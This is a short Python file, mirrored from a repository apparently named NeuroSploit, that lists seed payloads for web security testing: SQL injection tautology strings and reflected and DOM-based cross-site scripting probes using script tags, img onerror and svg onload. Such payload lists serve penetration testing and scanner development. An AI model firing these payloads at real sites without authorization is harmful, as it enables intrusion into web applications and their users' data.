mirror of
https://github.com/CyberSecurityUP/NeuroSploit.git
synced 2026-02-12 22:12:45 +00:00
20 lines
421 B
Python
20 lines
421 B
Python
SQLI_SEEDS = [
|
|
"1' OR '1'='1' -- ",
|
|
"' OR '1'='1' -- ",
|
|
"1' OR 1=1 -- ",
|
|
"1' OR '1'='1'#",
|
|
]
|
|
|
|
XSS_REFLECTED_SEEDS = [
|
|
'<script>alert("x")</script>',
|
|
'"><script>alert(1)</script>',
|
|
'<img src=x onerror=alert(1)>',
|
|
'<svg onload=alert(1)>',
|
|
]
|
|
|
|
XSS_DOM_SEEDS = [
|
|
'<script>alert("domxss")</script>',
|
|
'"><script>alert(document.domain)</script>',
|
|
'<img src=x onerror=alert("dom")>',
|
|
]
|